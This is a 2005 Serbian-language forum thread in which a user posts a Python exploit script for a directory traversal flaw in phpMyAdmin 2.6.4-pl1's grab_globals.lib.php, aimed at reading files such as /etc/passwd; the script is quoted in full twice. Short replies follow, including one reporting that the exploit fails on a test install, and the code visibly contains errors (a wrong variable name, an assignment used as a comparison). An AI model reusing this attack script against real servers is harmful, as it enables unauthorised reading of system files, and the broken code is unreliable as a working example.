Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit

[es] :: Security Coding :: phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit

[ Pregleda: 4690 | Odgovora: 5 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

BigBrother2005

Član broj: 54621
Poruke: 97

Sajt: sremcod.coconia.net


Profil

icon phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit19.10.2005. u 10:21 - pre 179 meseci
Code:

import httplib
# phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit
# modified by Crn1vuk5 and translated to Python
#this file could be used as import script
print "\r\n SecurityReason TEAM\r\n";
print "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1\r\n";
print " \r\n";
print "modified by Crn1vuk5 and translated to Python"
print " \r\n";
print "HOST - Host where is phpmyadmin example: http://localhost\r\n";
print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/\r\n";
print "FILE - file to inclusion ../../../../../etc/passwd\r\n\r\n";

def  phpMyAdminexploit(Host,Dir,File):
    h=httplib.HTTPConnection(Host)
    dirx=str(Dir)+"libraries/grab_globals.lib.php"
    filex="usesubform[1]=1&usesubform[2]=1&subform[1][redirect]="+str(file)+"&subform[1][cXIb8O3]=1"
    length=len(filex)
    h.putrequest('POST',dirx,'HTTP/1.0')
    print "Sending Exploit to target",Host,dirx,filex
    h.putheader('Host',Host)
    h.putheader('Accept','text/plain;q=0.8,image/png,*/*;q=0.5')
    h.putheader('Accept-Language',' en-us,en;q=0.5')
    h.putheader('Content-Type', 'application/x-www-form-urlencoded')
    h.putheader('Content-Length',length) 
    h.endheaders()
    h.send(filex) 
    r1 = h.getresponse()
    if r1.status="200 OK":
        print "exploit sent"
    else:
        print "expolit failed"

host_=raw_input("Enter the name of the Host : ")
dir_=raw_input("Enter the name of the Directory:")
file_=raw_input("File to inclusion:")

phpMyAdminexploit(host_,dir_,file_)



[Ovu poruku je menjao BigBrother2005 dana 19.10.2005. u 14:50 GMT+1]
[code]
print "Hello"
[/code]

---------------------------------------
Ljudi traze znanje, a ja trazim burek
 
Odgovor na temu

unknown-3

Član broj: 64850
Poruke: 145
*.suonline.net.



+1 Profil

icon Re: phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit19.10.2005. u 12:07 - pre 179 meseci
za cega je to cudo?:>
 
Odgovor na temu

Mitrović Srđan
bloodzero
Freelance
Majur //: Šabac

Član broj: 10261
Poruke: 2800
*.ptt.yu.

Sajt: freeshell-reviews.com


+4 Profil

icon Re: phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit19.10.2005. u 12:39 - pre 179 meseci
pa vidis valjda da pise u naslovu?
www.phpmyadmin.net/

[Ovu poruku je menjao aleksandrin dana 19.10.2005. u 13:39 GMT+1]

http://phpmyadmin.sourceforge.net/

[Ovu poruku je menjao aleksandrin dana 19.10.2005. u 13:40 GMT+1]
Tony Melendez:
http://video.google.com/videoplay?docid=-
3819862628517136815&q=tony+melendez

NIKADA NE UZIMATI HOSTING NA GO DADDY!


 
Odgovor na temu

anon28907

Član broj: 28907
Poruke: 647
*.eunet.yu.



Profil

icon Re: phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit19.10.2005. u 12:47 - pre 179 meseci
prevedeno u python ... c00l
 
Odgovor na temu

BigBrother2005

Član broj: 54621
Poruke: 97

Sajt: sremcod.coconia.net


Profil

icon Re: phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit19.10.2005. u 13:53 - pre 179 meseci
potkrala mi se greska... ispravio sam source.. ko ga je probo nek ga ponovo downloaduje...
[code]
print "Hello"
[/code]

---------------------------------------
Ljudi traze znanje, a ja trazim burek
 
Odgovor na temu

Danilo Cvjeticanin
Danilo Cvjeticanin
Apatin-Beograd

Član broj: 9614
Poruke: 3517
*.apatinonline.net.



+37 Profil

icon Re: phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit19.11.2005. u 19:01 - pre 178 meseci
Citat:
BigBrother2005:
Code:

import httplib
# phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit
# modified by Crn1vuk5 and translated to Python
#this file could be used as import script
print "\r\n SecurityReason TEAM\r\n";
print "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1\r\n";
print " \r\n";
print "modified by Crn1vuk5 and translated to Python"
print " \r\n";
print "HOST - Host where is phpmyadmin example: http://localhost\r\n";
print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/\r\n";
print "FILE - file to inclusion ../../../../../etc/passwd\r\n\r\n";

def  phpMyAdminexploit(Host,Dir,File):
h=httplib.HTTPConnection(Host)
dirx=str(Dir)+"libraries/grab_globals.lib.php"
filex="usesubform[1]=1&usesubform[2]=1&subform[1][redirect]="+str(file)+"&subform[1][cXIb8O3]=1"
length=len(filex)
h.putrequest('POST',dirx,'HTTP/1.0')
print "Sending Exploit to target",Host,dirx,filex
h.putheader('Host',Host)
h.putheader('Accept','text/plain;q=0.8,image/png,*/*;q=0.5')
h.putheader('Accept-Language',' en-us,en;q=0.5')
h.putheader('Content-Type', 'application/x-www-form-urlencoded')
h.putheader('Content-Length',length) 
h.endheaders()
h.send(filex) 
r1 = h.getresponse()
if r1.status="200 OK":
print "exploit sent"
else:
print "expolit failed"

host_=raw_input("Enter the name of the Host : ")
dir_=raw_input("Enter the name of the Directory:")
file_=raw_input("File to inclusion:")

phpMyAdminexploit(host_,dir_,file_)



[Ovu poruku je menjao BigBrother2005 dana 19.10.2005. u 14:50 GMT+1]


Jeste da je proslo mesec dana od izlaska sploita. Ali ovaj sploit ne radi. Tesitrao sam ga na localhostu bas na toj verziji i ne radi.
 
Odgovor na temu

[es] :: Security Coding :: phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit

[ Pregleda: 4690 | Odgovora: 5 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.